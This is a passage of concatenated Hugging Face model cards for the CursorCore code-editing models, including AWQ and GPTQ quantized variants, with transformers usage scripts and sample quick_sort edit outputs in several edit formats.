from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-QW2.5-7B-AWQ | TechxGenus | 2024-10-10T06:42:49Z | 79 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-QW2.5-7B",
"base_model:quantized:TechxGenus/CursorCore-QW2.5-7B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"awq",
"region:us"
] | text-generation | 2024-10-06T13:05:40Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-QW2.5-7B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>
## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
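Since this repository hosts the AWQ-quantized 7B variant, the following is a hedged sketch of loading this specific checkpoint; it relies on the built-in AWQ support in 🤗 Transformers (the `autoawq` package must be installed) and otherwise works with the same chat templates as the scripts in the Usage section below.
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

# Assumption: `pip install autoawq`; Transformers then dispatches AWQ weights automatically.
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-QW2.5-7B-AWQ")
model = AutoModelForCausalLM.from_pretrained(
    "TechxGenus/CursorCore-QW2.5-7B-AWQ",
    torch_dtype=torch.float16,  # AWQ kernels run in fp16
    device_map="auto",
)
````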
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework for AI-assisted programming tasks. It is designed to align anything during the programming process and is used to implement features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-QW2.5-7B-GPTQ | TechxGenus | 2024-10-10T06:42:45Z | 77 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-QW2.5-7B",
"base_model:quantized:TechxGenus/CursorCore-QW2.5-7B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"gptq",
"region:us"
] | text-generation | 2024-10-08T04:58:54Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-QW2.5-7B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>
## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework for AI-assisted programming tasks. It is designed to align anything during the programming process and is used to implement features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
